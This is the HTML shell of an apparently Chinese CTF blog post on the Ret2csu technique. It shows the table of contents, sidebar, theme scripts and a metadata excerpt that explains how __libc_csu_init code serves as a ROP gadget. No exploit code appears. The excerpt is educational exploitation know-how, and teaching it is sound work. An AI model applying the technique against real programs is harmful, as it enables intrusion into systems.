    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ret2csu"><span class="toc-number">1.</span> <span class="toc-text">Ret2csu</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B"><span class="toc-number">1.2.</span> <span class="toc-text">实战案例</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Pwn%E9%A2%98%E6%BB%9E%E9%94%80-%E5%B8%AE%E5%B8%AE%E6%88%91%E5%A5%BD%E5%90%97-%EF%BC%88Ret2csu%EF%BC%89"><span class="toc-number">1.2.1.</span> <span class="toc-text">Pwn题滞销,帮帮我好吗_（Ret2csu）</span></a></li></ol></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">148</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">20</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">171</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>




  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "ALL",
          title: "Ret2csu",
          url: "http://example.com/2019/05/22/Ret2csu/",
          excerpt: "",
          description: "",
          stripContent: "Ret2csu原理在 glibc 的源码中，有一个函数叫 __libc_csu_init，它在程序启动时负责调用 .init_array 中的初始化函数 这个函数末尾有一段普适性很强的指令，经常被用作 ROP gadget。安全研究者最早将利用这段代码的技术称为 Return-to-csu，简称 Ret2csu。 因为 __libc_csu_init 是 libc 标准启动代码的一部分，只要程序是动态链接的，几乎一定存在，而且在没有 PIE 的情况下地址固定。这给了攻击者在 “找不到常规 pop",
          date: "Wed May 22 2019 14:23:00 GMT+0800",
          updated: "Sun Jun 14 2026 23:38:03 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      
<script src="/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        


  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>




  </body>
  </html>
